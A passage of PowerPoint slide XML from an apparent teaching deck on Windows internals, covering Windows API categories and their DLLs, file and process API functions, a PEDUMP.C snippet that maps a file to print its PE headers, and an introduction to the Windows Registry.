              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>error handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(Kernel32.dll)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Advanced Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Provide access to functions beyond the kernel, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> a service, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>manage user accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> (advapi32.dll, advapires32.dll).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Graphics Device Interface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Provides functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>output graphics content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to monitors, printers, and other output devices (gdi32.dll)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>User Interface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Provides the functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>create and manage screen windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>most basic controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, such as buttons and scrollbars, receive mouse and keyboard input, and other functions associated with the graphical user interface (GUI) part of Windows (user32.dll)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-180975" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>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13"/>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Windows API - Category</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p113"/>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b="1" lang="en-GB"/>
              <a:t>Common Dialog Box Library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Provides applications the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>standard dialog boxes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to open and save files, choose color and font, etc. (comdlg32.dll) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Common Control Library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Gives applications access to some advanced controls provided by the operating system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>status bars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>progress bars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>toolbars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>tabs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(comctl32.dll). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Windows Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Allows applications to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>access functions provided by the operating system shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, and to change and enhance it (shell32.dll).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Network Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Give access to the various networking abilities of the operating system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Winsock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>NetDDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, remote procedure call (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>) and many more (netapi32.dll).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-166687" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-17087" y="-9933"/>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Windows API (E.g.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p114"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>File System API Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CreateFile; DeleteFile;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ReadFile(Ex); WriteFile(Ex)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>FindFirstFile(Ex); FindNextFile; FindClose</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CreateFileMapping/MapViewOfFile/UnmapViewOfFile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>GetFileAttribute</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g. PEDUMP.C</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Process API Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CreateToolhelp32Snapshot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Process32First(W); Process32Next</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>OpenProcess; OpenThread; TerminateProcess; TerminateThread</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a: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15"/>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126" name="Google Shape;1126;p115"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9036497" cy="67403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void DumpFile(LPSTR filename)</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    HANDLE hFile;</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    HANDLE hFileMapping;</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    LPVOID lpFileBase;</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    PIMAGE_DOS_HEADER dosHeader;</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    hFile = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(filename, GENERIC_READ, FILE_SHARE_READ, NULL,</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                        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);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    if ( hFile = = INVALID_HANDLE_VALUE )</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    {   printf("Couldn't open file with CreateFile()\n");</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        return;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    hFileMapping = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(hFile, NULL, PAGE_READONLY, 0, 0, NULL);</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    if ( hFileMapping = = 0 )</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    {   CloseHandle(hFile);</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        printf("Couldn't open file mapping with CreateFileMapping()\n");</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        return;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    lpFileBase = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(hFileMapping, FILE_MAP_READ, 0, 0, 0);</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    if ( lpFileBase = = 0 )</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        CloseHandle(hFileMapping);</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        CloseHandle(hFile);</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        printf("Couldn't map view of file with MapViewOfFile()\n");</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        return;</a:t>
            </a:r>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GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>    printf("Dump of file %s\n\n", filename);</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16"/>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p116"/>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Window Registry: used to store OS and program configuration information, such as settings and options.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Image result for windows registry" id="1135" name="Google Shape;1135;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846375" y="2348880"/>
            <a:ext cx="6048671" cy="4169678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225745" y="2965594"/>
            <a:ext cx="2613216" cy="267765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lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Hierarchical database</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>5 top-level sections </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>(HKEY)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Subkey</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Value Entry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
